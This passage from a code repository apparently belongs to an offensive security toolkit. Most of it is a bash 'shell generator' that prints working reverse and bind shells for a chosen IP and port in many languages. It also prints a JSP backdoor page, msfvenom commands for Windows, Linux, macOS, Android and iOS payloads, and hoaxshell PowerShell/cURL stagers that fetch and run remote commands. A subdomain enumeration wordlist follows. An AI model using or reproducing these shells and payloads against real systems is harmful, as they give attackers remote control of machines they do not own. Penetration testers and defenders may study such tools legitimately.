 664 |         echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'";;
 665 |          "Python3 #1")
 666 |         echo "export RHOST="$ip";export RPORT=$port;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'";;
 667 |          "Python3 #2")
 668 |         echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ip",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'";;
 669 |          "Python3 Windows")
 670 |         echo "import os,socket,subprocess,threading;
 671 | def s2p(s, p):
 672 |     while True:
 673 |         data = s.recv(1024)
 674 |         if len(data) > 0:
 675 |             p.stdin.write(data)
 676 |             p.stdin.flush()
 677 | 
 678 | def p2s(s, p):
 679 |     while True:
 680 |         s.send(p.stdout.read(1))
 681 | 
 682 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 683 | s.connect(("$ip",$port))
 684 | 
 685 | p=subprocess.Popen(["bash"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
 686 | 
 687 | s2p_thread = threading.Thread(target=s2p, args=[s, p])
 688 | s2p_thread.daemon = True
 689 | s2p_thread.start()
 690 | 
 691 | p2s_thread = threading.Thread(target=p2s, args=[s, p])
 692 | p2s_thread.daemon = True
 693 | p2s_thread.start()
 694 | 
 695 | try:
 696 |     p.wait()
 697 | except KeyboardInterrupt:
 698 |     s.close()";;
 699 |          "Python3 shortest")
 700 |         echo "python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("$ip",$port));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'";;
 701 |          "Ruby #1")
 702 |          echo "ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("$ip",$port))'";;
 703 |         "Ruby no sh")
 704 |          echo "ruby -rsocket -e'exit if fork;c=TCPSocket.new("$ip","$port");loop{c.gets.chomp!;(exit! if $_=="exit");($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){|io|c.print io.read}))rescue c.puts "failed: #{$_}"}'"#
 705 |          ;;
 706 |         "socat #1")
 707 |         echo "socat TCP:$ip:$port EXEC:bash";;
 708 |         "socat #2 (TTY)")
 709 |         echo "socat TCP:$ip:$port EXEC:'bash',pty,stderr,setsid,sigint,sane";;
 710 |         "sqlite3 nc mkfifo")
 711 |         echo "sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc $ip $port >/tmp/f'";;
 712 |         "node.js")
 713 |         echo "require('child_process').exec('nc -e bash $ip $port')";;
 714 |             "node.js #2")
 715 |         echo "(function(){
 716 |     var net = require("net"),
 717 |         cp = require("child_process"),
 718 |         sh = cp.spawn("bash", []);
 719 |     var client = new net.Socket();
 720 |     client.connect($port, "$ip", function(){
 721 |         client.pipe(sh.stdin);
 722 |         sh.stdout.pipe(client);
 723 |         sh.stderr.pipe(client);
 724 |     });
 725 |     return /a/; // Prevents the Node.js application from crashing
 726 | })();";;
 727 |         "Java #1")
 728 |         echo "public class shell {
 729 |     public static void main(String[] args) {
 730 |         Process p;
 731 |         try {
 732 |             p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/$ip/$port 0>&1");
 733 |             p.waitFor();
 734 |             p.destroy();
 735 |         } catch (Exception e) {}
 736 |     }
 737 | }";;
 738 |                 "Java #2")
 739 |         echo "public class shell {
 740 |     public static void main(String[] args) {
 741 |         ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/$ip/$port 0>&1")
 742 |             .redirectErrorStream(true);
 743 |         try {
 744 |             Process p = pb.start();
 745 |             p.waitFor();
 746 |             p.destroy();
 747 |         } catch (Exception e) {}
 748 |     }
 749 | }";;
 750 |                 "Java #3")
 751 |         echo "import java.io.InputStream;
 752 | import java.io.OutputStream;
 753 | import java.net.Socket;
 754 | 
 755 | public class shell {
 756 |     public static void main(String[] args) {
 757 |         String host = "$ip";
 758 |         int port = $port;
 759 |         String cmd = "bash";
 760 |         try {
 761 |             Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
 762 |             Socket s = new Socket(host, port);
 763 |             InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
 764 |             OutputStream po = p.getOutputStream(), so = s.getOutputStream();
 765 |             while (!s.isClosed()) {
 766 |                 while (pi.available() > 0)
 767 |                     so.write(pi.read());
 768 |                 while (pe.available() > 0)
 769 |                     so.write(pe.read());
 770 |                 while (si.available() > 0)
 771 |                     po.write(si.read());
 772 |                 so.flush();
 773 |                 po.flush();
 774 |                 Thread.sleep(50);
 775 |                 try {
 776 |                     p.exitValue();
 777 |                     break;
 778 |                 } catch (Exception e) {}
 779 |             }
 780 |             p.destroy();
 781 |             s.close();
 782 |         } catch (Exception e) {}
 783 |     }
 784 | }";;
 785 |                 "Java Web")
 786 |         echo "<%@
 787 | page import="java.lang.*, java.util.*, java.io.*, java.net.*"
 788 | % >
 789 | <%!
 790 | static class StreamConnector extends Thread
 791 | {
 792 |         InputStream is;
 793 |         OutputStream os;
 794 |         StreamConnector(InputStream is, OutputStream os)
 795 |         {
 796 |                 this.is = is;
 797 |                 this.os = os;
 798 |         }
 799 |         public void run()
 800 |         {
 801 |                 BufferedReader isr = null;
 802 |                 BufferedWriter osw = null;
 803 |                 try
 804 |                 {
 805 |                         isr = new BufferedReader(new InputStreamReader(is));
 806 |                         osw = new BufferedWriter(new OutputStreamWriter(os));
 807 |                         char buffer[] = new char[8192];
 808 |                         int lenRead;
 809 |                         while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
 810 |                         {
 811 |                                 osw.write(buffer, 0, lenRead);
 812 |                                 osw.flush();
 813 |                         }
 814 |                 }
 815 |                 catch (Exception ioe)
 816 |                 try
 817 |                 {
 818 |                         if(isr != null) isr.close();
 819 |                         if(osw != null) osw.close();
 820 |                 }
 821 |                 catch (Exception ioe)
 822 |         }
 823 | }
 824 | %>
 825 | 
 826 | <h1>JSP Backdoor Reverse Shell</h1>
 827 | 
 828 | <form method="post">
 829 | IP Address
 830 | <input type="text" name="ipaddress" size=30>
 831 | Port
 832 | <input type="text" name="port" size=10>
 833 | <input type="submit" name="Connect" value="Connect">
 834 | </form>
 835 | <p>
 836 | <hr>
 837 | 
 838 | <%
 839 | String ipAddress = request.getParameter("ipaddress");
 840 | String ipPort = request.getParameter("port");
 841 | if(ipAddress != null && ipPort != null)
 842 | {
 843 |         Socket sock = null;
 844 |         try
 845 |         {
 846 |                 sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
 847 |                 Runtime rt = Runtime.getRuntime();
 848 |                 Process proc = rt.exec("cmd.exe");
 849 |                 StreamConnector outputConnector =
 850 |                         new StreamConnector(proc.getInputStream(),
 851 |                                           sock.getOutputStream());
 852 |                 StreamConnector inputConnector =
 853 |                         new StreamConnector(sock.getInputStream(),
 854 |                                           proc.getOutputStream());
 855 |                 outputConnector.start();
 856 |                 inputConnector.start();
 857 |         }
 858 |         catch(Exception e) 
 859 | }
 860 | %>";;
 861 |                
 862 |                 "Javascript")
 863 |         echo "(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();";;
 864 |                 "Groovy")
 865 |         echo "String host="$ip";int port=$port;String cmd="bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();";;
 866 |                 "telnet")
 867 |         echo "TF=$(mktemp -u);mkfifo $TF && telnet $ip $port 0<$TF | bash 1>$TF";;
 868 |                 "zsh")
 869 |         echo "zsh -c 'zmodload zsh/net/tcp && ztcp $ip $port && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'";;
 870 |                 "Lua #1")
 871 |         echo "lua -e require('socket');require('os');t=socket.tcp();t:connect('$ip','$port');os.execute('bash -i <&3 >&3 2>&3');";;
 872 |                 "Lua #2")
 873 |         echo "lua5.1 -e 'local host, port = "$ip", $port local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'";;
 874 |             "TCLsh")
 875 |             echo "echo 'set s [socket LHOST LPORT];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh";;
 876 |                 "Golanguage")
 877 |         echo "echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","$ip:$port");cmd:=exec.Command("bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go";;
 878 |                 "Awk")
 879 |         echo "awk 'BEGIN {s = "/inet/tcp/0/$ip/$port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null";;
 880 |                 "Dart")
 881 |         echo "import 'dart:io';
 882 | import 'dart:convert';
 883 | 
 884 | main() {
 885 |   Socket.connect("$ip", $port).then((socket) {
 886 |     socket.listen((data) {
 887 |       Process.start('bash', []).then((Process process) {
 888 |         process.stdin.writeln(new String.fromCharCodes(data).trim());
 889 |         process.stdout
 890 |           .transform(utf8.decoder)
 891 |           .listen((output) { socket.write(output); });
 892 |       });
 893 |     },
 894 |     onDone: () {
 895 |       socket.destroy();
 896 |     });
 897 |   });
 898 | }";;
 899 |                 "Crystal (system)")
 900 |         echo "crystal eval 'require "process";require "socket";c=Socket.tcp(Socket::Family::INET);c.connect("$ip",$port);loop{m,l=c.receive;p=Process.new(m.rstrip("\n"),output:Process::Redirect::Pipe,shell:true);c<<p.output.gets_to_end}'";;
 901 |                 "Crystal (code)")
 902 |         echo "require "process"
 903 | require "socket"
 904 | 
 905 | c = Socket.tcp(Socket::Family::INET)
 906 | c.connect("$ip", $port)
 907 | loop do 
 908 |   m, l = c.receive
 909 |   p = Process.new(m.rstrip("\n"), output:Process::Redirect::Pipe, shell:true)
 910 |   c << p.output.gets_to_end
 911 | end";;
 912 |             esac
 913 |             ;;
 914 |         "bind")
 915 |             case "$shell_name" in
 916 |                 "Python3 Bind")
 917 |                     echo "python3 -c 'exec(\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\'0.0.0.0\',$port));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.send(p.stdout.read()+p.stderr.read())\")'"
 918 |                     ;;
 919 |                 "PHP Bind")
 920 |                     echo "php -r '\$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind(\$s,\"0.0.0.0\",$port);socket_listen(\$s,1);\$cl=socket_accept(\$s);while(1){if(!socket_write(\$cl,\"$ \",2))exit;$in=socket_read(\$cl,100);popen(\"$in\",\"r\");}"
 921 |                     ;;
 922 |                 "nc Bind")
 923 |                 echo "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 0.0.0.0 $port > /tmp/f";;
 924 | 
 925 |             esac
 926 |             ;;
 927 |         "msfvenom")
 928 |             case "$shell_name" in
 929 |                 "Windows Meterpreter Staged Reverse TCP (x64)")
 930 |                     echo "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f exe -o reverse_shell.exe"
 931 |                     ;;
 932 |                 "Windows Meterpreter Stageless Reverse TCP (x64)" )
 933 |                     echo "msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f exe -o reverse.exe"
 934 |                     ;;  
 935 |                 "Windwos Staged JSP Reverse TCP")
 936 |                     echo "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f jsp -o ./rev.jsp";;
 937 |                 "Linux Meterpreter Staged Reverse TCP (x64)")
 938 |                     echo "msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f elf -o reverse.elf";;
 939 |                 "Linux Stageless Reverse TCP (x64)")
 940 |                     echo "msfvenom -p linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port -f elf -o reverse.elf";;
 941 |                 "Bash Stageless Reverse TCP")
 942 |                     echo "msfvenom -p cmd/unix/reverse_bash LHOST=$ip LPORT=$port -f raw -o shell.sh";;
 943 |                 "Python Stageless Reverse TCP")
 944 |                     echo "msfvenom -p cmd/unix/reverse_python LHOST=$ip LPORT=$port -f raw";;
 945 |                     "Apple iOS Meterpreter Reverse TCP Inline")
 946 |                     echo "msfvenom --platform apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost=$ip lport=$port -f macho -o payload";;
 947 |                     "Android Meterpreter Embed Reverse TCP")
 948 |                     echo "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost=$ip lport=$port -o payload.apk";;
 949 |                     "Android Meterpreter Reverse TCP")
 950 |                     echo "msfvenom --platform android -p android/meterpreter/reverse_tcp lhost=$ip lport=$port R -o malicious.apk";;
 951 |                     "WAR Stageless Reverse TCP")
 952 |                     echo "msfvenom -p java/shell_reverse_tcp LHOST=$ip LPORT=$port -f war -o shell.war";;
 953 |                     "JSP Stageless Reverse TCP")
 954 |                     echo "msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ip LPORT=$port -f raw -o shell.jsp";;
 955 |                     "PHP Reverse PHP")
 956 |                     echo "msfvenom -p php/reverse_php LHOST=$ip LPORT=$port -o shell.php";;
 957 |                     "PHP Meterpreter Stageless Reverse TCP")
 958 |                     echo "msfvenom -p php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port -f raw -o shell.php";;
 959 |                     "macOS Meterpreter Staged Reverse TCP (x64)")
 960 |                     echo "msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -f macho -o shell.macho";;
 961 |             esac
 962 |             ;;
 963 |         "hoaxshell")
 964 |             case "$shell_name" in
 965 |                 "Windows CMD cURL")
 966 |                     echo "@echo off&cmd /V:ON /C \"SET ip=$ip:$port&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!cmd.bat & type !temp!cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!cmd.bat > !tmp!out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!out.txt > NUL)) & timeout 1\" > NUL"
 967 |                     ;;
 968 |                 "PowerShell IEX")
 969 |                     echo "powershell -e [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes(\"IEX(New-Object Net.WebClient).DownloadString('http://$ip:$port')\"))"
 970 |                     ;;
 971 |                 "PowerShell Outfile")
 972 |                     echo "$s='$ip:$port';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f="C:Users$env:USERNAME.localhack.ps1";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{"Authorization"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{"Authorization"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo "$c" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{"Authorization"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}";;
 973 |             esac
 974 |             ;;
 975 |     esac
 976 | }
 977 | 
 978 | display_main_menu() {
 979 |     clear
 980 |     echo -e "${MAGENTA}╔══════════════════════════════════╗${RESET}"
 981 |     echo -e "${MAGENTA}║     ${CYAN}Advanced Shell Generator     ${MAGENTA}║${RESET}"
 982 |     echo -e "${MAGENTA}╚══════════════════════════════════╝${RESET}"
 983 |     echo -e "${YELLOW}1. ${GREEN}Reverse Shells${RESET}"
 984 |     echo -e "${YELLOW}2. ${GREEN}Bind Shells${RESET}"
 985 |     echo -e "${YELLOW}3. ${GREEN}MSFVenom Payloads${RESET}"
 986 |     echo -e "${YELLOW}4. ${GREEN}HoaxShell${RESET}"
 987 |     echo -e "${YELLOW}5. ${RED}Exit${RESET}"
 988 | }
 989 | 
 990 | select_shell() {
 991 |     local shells=("$@")
 992 |     local selected=0
 993 |     local page=0
 994 |     local page_size=20
 995 |     local total_pages=$((${#shells[@]} / page_size))
 996 |     local key
 997 | 
 998 |     while true; do
 999 |         clear
1000 |         echo -e "${BLUE}Use up/down arrows to navigate. Press Enter to select.${RESET}"
1001 |         echo -e "${BLUE}Use left/right arrows to change pages.${RESET}"
1002 |         echo -e "${YELLOW}Page $((page + 1))/$((total_pages + 1))${RESET}"
1003 |         
1004 |         local start=$((page * page_size))
1005 |         local end=$((start + page_size))
1006 |         [[ $end -gt ${#shells[@]} ]] && end=${#shells[@]}
1007 |         
1008 |         for i in $(seq $start $((end - 1))); do
1009 |             if [ $i -eq $selected ]; then
1010 |                 echo -e "${YELLOW}=> ${GREEN}${shells[$i]}${RESET}"
1011 |             else
1012 |                 echo -e "  ${CYAN}${shells[$i]}${RESET}"
1013 |             fi
1014 |         done
1015 | 
1016 |         read -s -n 3 key
1017 | 
1018 |         case "$key" in
1019 |             $'\e[A') 
1020 |                 ((selected--))
1021 |                 [[ $selected -lt $start ]] && selected=$((end - 1))
1022 |                 ;;
1023 |             $'\e[B') 
1024 |                 ((selected++))
1025 |                 [[ $selected -ge $end ]] && selected=$start
1026 |                 ;;
1027 |             $'\e[D')
1028 |                 if ((page > 0)); then
1029 |                     ((page--))
1030 |                     selected=$((page * page_size))
1031 |                 fi
1032 |                 ;;
1033 |             $'\e[C') 
1034 |                 if ((page < total_pages)); then
1035 |                     ((page++))
1036 |                     selected=$((page * page_size))
1037 |                 fi
1038 |                 ;;
1039 |             '') 
1040 |                 echo "You selected: ${shells[$selected]}"
1041 |                 generate_shell "$current_type" "${shells[$selected]}"
1042 |                 read -p "Press any key to continue..."
1043 |                 return
1044 |                 ;;
1045 |         esac
1046 |     done
1047 | }
1048 | 
1049 | get_file_extension() {
1050 |     local shell_name=$1
1051 |     case "$shell_name" in
1052 |         php*|PHP*)
1053 |             echo "php";;
1054 |         node.js|Javascript*)
1055 |             echo "js";;
1056 |         Python*)
1057 |             echo "py"
1058 |             ;;
1059 |         PowerShell*|Windows*)
1060 |             echo "ps1"
1061 |             ;;
1062 |         Bash*|zsh*|socat*|nc*|telnet*|Awk*)
1063 |             echo "sh"
1064 |             ;;
1065 |         Java*)
1066 |             echo "java";;
1067 |         C*)
1068 |             echo "c"
1069 |             ;;
1070 |         msfvenom*)
1071 |             echo "rc"
1072 |             ;;
1073 |         *)
1074 |             echo "txt"
1075 |             ;;
1076 |     esac
1077 | }
1078 | 
1079 | generate_shell() {
1080 |     local shell_type=$1
1081 |     local shell_name=$2
1082 |     read -p "Enter IP address: " ip
1083 |     read -p "Enter port number: " port
1084 |     
1085 |     local shell_code=$(get_shell_code "$shell_type" "$shell_name")
1086 |     
1087 |  if [ -n "$shell_code" ]; then
1088 |     echo -e "${GREEN}Generating $shell_name shell...${RESET}"
1089 |     echo -e "${YELLOW}Shell command:${RESET}"
1090 |     echo -e "${CYAN}$shell_code${RESET}"
1091 |     
1092 |     extension=$(get_file_extension "$shell_name")
1093 |     
1094 |     # filename="${shell_name// /_}-reverse-shell.$extension"
1095 |     # echo "$shell_code" > "$filename"
1096 |     # echo -e "${GREEN}Shell command saved to $filename${RESET}"
1097 | else
1098 |     echo -e "${RED}Shell code not found for $shell_name${RESET}"
1099 | fi
1100 | 
1101 | }
1102 | 
1103 | while true; do
1104 |     display_main_menu
1105 |     read -p "Enter your choice: " choice
1106 | 
1107 |     case $choice in
1108 |         1)
1109 |             current_type="reverse"
1110 |             reverse_shells=(
1111 |                 "Bash -i" "Bash 196" "Bash read line" "Bash 5" "Bash udp"
1112 |                 "nc mkfifo" "nc -e" "nc.exe -e" "BusyBox nc -e" "nc -c"
1113 |                 "ncat -e" "ncat.exe -e" "ncat udp" "curl" "rustcat"
1114 |                 "C" "C Windows" "C# TCP Client" "C# Bash -i" "Haskell #1"
1115 |                 "Perl" "Perl no sh" "PHP PentestMonkey" "PHP Ivan Sincek"
1116 |                 "PHP cmd" "PHP cmd 2" "PHP cmd small" "PHP exec" "PHP shell_exec"
1117 |                 "PHP system" "PHP passthru" "PHP" "PHP popen" 
1118 |                 "Windows ConPty" "PowerShell #1" "PowerShell #2" "PowerShell #3" "PowerShell #4 (TLS)"
1119 |                 "PowerShell #3 (Base64)" "Python #1" "Python #2" "Python3 #1" "Python3 #2"
1120 |                 "Python3 Windows" "Python3 shortest" "Ruby #1" "Ruby no sh" "socat #1"
1121 |                 "socat #2 (TTY)" "sqlite3 nc mkfifo" "node.js" "node.js #2" "Java #1"
1122 |                 "Java #2" "Java #3" "Java Web"  "Javascript"
1123 |                 "Groovy" "telnet" "zsh" "Lua #1" "Lua #2"
1124 |                 "Golanguage"  "Awk" "Dart" "Crystal (system)"
1125 |                 "Crystal (code)"
1126 |             )
1127 |             select_shell "${reverse_shells[@]}"
1128 |             ;;
1129 |         2)
1130 |             current_type="bind"
1131 |             bind_shells=("Python3 Bind" "PHP Bind" "nc Bind" )
1132 |             select_shell "${bind_shells[@]}"
1133 |             ;;
1134 |         3)
1135 |             current_type="msfvenom"
1136 |             msfvenom_payloads=(
1137 |                 "Windows Meterpreter Staged Reverse TCP (x64)"
1138 |                 "Windows Meterpreter Stageless Reverse TCP (x64)"
1139 |                 "Windows Staged Reverse TCP (x64)"
1140 |                 "Windows Stageless Reverse TCP (x64)"
1141 |                 "Windows Staged JSP Reverse TCP"
1142 |                 "Linux Meterpreter Staged Reverse TCP (x64)"
1143 |                 "Linux Stageless Reverse TCP (x64)"
1144 |                 "Windows Bind TCP ShellCode - BOF"
1145 |                 "macOS Meterpreter Staged Reverse TCP (x64)"
1146 |                 "macOS Meterpreter Stageless Reverse TCP (x64)"
1147 |                 "macOS Stageless Reverse TCP (x64)"
1148 |                 "PHP Meterpreter Stageless Reverse TCP"
1149 |                 "PHP Reverse PHP"
1150 |                 "JSP Stageless Reverse TCP"
1151 |                 "WAR Stageless Reverse TCP"
1152 |                 "Android Meterpreter Reverse TCP"
1153 |                 "Android Meterpreter Embed Reverse TCP"
1154 |                 "Apple iOS Meterpreter Reverse TCP Inline"
1155 |                 "Python Stageless Reverse TCP"
1156 |                 "Bash Stageless Reverse TCP"
1157 |             )
1158 |             select_shell "${msfvenom_payloads[@]}"
1159 |             ;;
1160 |         4)
1161 |             current_type="hoaxshell"
1162 |             hoaxshell=(
1163 |                 "Windows CMD cURL" "PowerShell IEX" "PowerShell IEX Constr Lang Mode"
1164 |                 "PowerShell Outfile" "PowerShell Outfile Constr Lang Mode"
1165 |                 "PowerShell Outfile Constr Lang Mode https"
1166 |             )
1167 |             select_shell "${hoaxshell[@]}"
1168 |             ;;
1169 |         5)
1170 |             echo -e "${RED}Exiting...${RESET}"
1171 |             exit 0
1172 |             ;;
1173 |         *)
1174 |             echo -e "${RED}Invalid option. Please try again.${RESET}"
1175 |             read -p "Press any key to continue..."
1176 |             ;;
1177 |     esac
1178 | done
1179 | 


--------------------------------------------------------------------------------
/tools/default_subdomains.txt:
--------------------------------------------------------------------------------
   1 | www
   2 | mail
   3 | ftp
   4 | localhost
   5 | webmail
   6 | smtp
   7 | webdisk
   8 | pop
   9 | cpanel
  10 | whm
  11 | ns1
  12 | ns2
  13 | autodiscover
  14 | autoconfig
  15 | ns
  16 | test
  17 | m
  18 | blog
  19 | dev
  20 | www2
  21 | ns3
  22 | pop3
  23 | forum
  24 | admin
  25 | mail2
  26 | vpn
  27 | mx
  28 | imap
  29 | old
  30 | new
  31 | mobile
  32 | mysql
  33 | beta
  34 | support
  35 | cp
  36 | secure
  37 | shop
  38 | demo
  39 | dns2
  40 | ns4
  41 | dns1
  42 | static
  43 | lists
  44 | web
  45 | www1
  46 | img
  47 | news
  48 | portal
  49 | server
  50 | wiki
  51 | api
  52 | media
  53 | images
  54 | www.blog
  55 | backup
  56 | dns
  57 | sql
  58 | intranet
  59 | www.forum
  60 | www.test
  61 | stats
  62 | host
  63 | video
  64 | mail1
  65 | mx1
  66 | www3
  67 | staging
  68 | www.m
  69 | sip
  70 | chat
  71 | search
  72 | crm
  73 | mx2
  74 | ads
  75 | ipv4
  76 | remote
  77 | email
  78 | my
  79 | wap
  80 | svn
  81 | store
  82 | cms
  83 | download
  84 | proxy
  85 | www.dev
  86 | mssql
  87 | apps
  88 | dns3
  89 | exchange
  90 | mail3
  91 | forums
  92 | ns5
  93 | db
  94 | office
  95 | live
  96 | files
  97 | info
  98 | owa
  99 | monitor
 100 | helpdesk
 101 | panel
 102 | sms
 103 | newsletter
 104 | ftp2
 105 | web1
 106 | web2
 107 | upload
 108 | home
 109 | bbs
 110 | login
 111 | app
 112 | en
 113 | blogs
 114 | it
 115 | cdn
 116 | stage
 117 | gw
 118 | dns4
 119 | www.demo
 120 | ssl
 121 | cn
 122 | smtp2
 123 | vps
 124 | ns6
 125 | relay
 126 | online
 127 | service
 128 | test2
 129 | radio
 130 | ntp
 131 | library
 132 | help
 133 | www4
 134 | members
 135 | tv
 136 | www.shop
 137 | extranet
 138 | hosting
 139 | ldap
 140 | services
 141 | webdisk.blog
 142 | s1
 143 | i
 144 | survey
 145 | s
 146 | www.mail
 147 | www.new
 148 | c-n7k-v03-01.rz
 149 | data
 150 | docs
 151 | c-n7k-n04-01.rz
 152 | ad
 153 | legacy
 154 | router
 155 | de
 156 | meet
 157 | cs
 158 | av
 159 | sftp
 160 | server1
 161 | stat
 162 | moodle
 163 | facebook
 164 | test1
 165 | photo
 166 | partner
 167 | nagios
 168 | mrtg
 169 | s2
 170 | mailadmin
 171 | dev2
 172 | ts
 173 | autoconfig.blog
 174 | autodiscover.blog
 175 | games
 176 | jobs
 177 | image
 178 | host2
 179 | gateway
 180 | preview
 181 | www.support
 182 | im
 183 | ssh
 184 | correo
 185 | control
 186 | ns0
 187 | vpn2
 188 | cloud
 189 | archive
 190 | citrix
 191 | webdisk.m
 192 | voip
 193 | connect
 194 | game
 195 | smtp1
 196 | access
 197 | lib
 198 | www5
 199 | gallery
 200 | redmine
 201 | es
 202 | irc
 203 | stream
 204 | qa
 205 | dl
 206 | billing
 207 | construtor
 208 | lyncdiscover
 209 | painel
 210 | fr
 211 | projects
 212 | a
 213 | pgsql
 214 | mail4
 215 | tools
 216 | iphone
 217 | server2
 218 | dbadmin
 219 | manage
 220 | jabber
 221 | music
 222 | webmail2
 223 | www.beta
 224 | mailer
 225 | phpmyadmin
 226 | t
 227 | reports
 228 | rss
 229 | pgadmin
 230 | images2
 231 | mx3
 232 | www.webmail
 233 | ws
 234 | content
 235 | sv
 236 | web3
 237 | community
 238 | poczta
 239 | www.mobile
 240 | ftp1
 241 | dialin
 242 | us
 243 | sp
 244 | panelstats
 245 | vip
 246 | cacti
 247 | s3
 248 | alpha
 249 | videos
 250 | ns7
 251 | promo
 252 | testing
 253 | sharepoint
 254 | marketing
 255 | sitedefender
 256 | member
 257 | webdisk.dev
 258 | emkt
 259 | training
 260 | edu
 261 | autoconfig.m
 262 | git
 263 | autodiscover.m
 264 | catalog
 265 | webdisk.test
 266 | job
 267 | ww2
 268 | www.news
 269 | sandbox
 270 | elearning
 271 | fb
 272 | webmail.cp
 273 | downloads
 274 | speedtest
 275 | design
 276 | staff
 277 | master
 278 | panelstatsmail
 279 | v2
 280 | db1
 281 | mailserver
 282 | builder.cp
 283 | travel
 284 | mirror
 285 | ca
 286 | sso
 287 | tickets
 288 | alumni
 289 | sitebuilder
 290 | www.admin
 291 | auth
 292 | jira
 293 | ns8
 294 | partners
 295 | ml
 296 | list
 297 | images1
 298 | club
 299 | business
 300 | update
 301 | fw
 302 | devel
 303 | local
 304 | wp
 305 | streaming
 306 | zeus
 307 | images3
 308 | adm
 309 | img2
 310 | gate
 311 | pay
 312 | file
 313 | seo
 314 | status
 315 | share
 316 | maps
 317 | zimbra
 318 | webdisk.forum
 319 | trac
 320 | oa
 321 | sales
 322 | post
 323 | events
 324 | project
 325 | xml
 326 | wordpress
 327 | images4
 328 | main
 329 | english
 330 | e
 331 | img1
 332 | db2
 333 | time
 334 | redirect
 335 | go
 336 | bugs
 337 | direct
 338 | www6
 339 | social
 340 | www.old
 341 | development
 342 | calendar
 343 | www.forums
 344 | ru
 345 | www.wiki
 346 | monitoring
 347 | hermes
 348 | photos
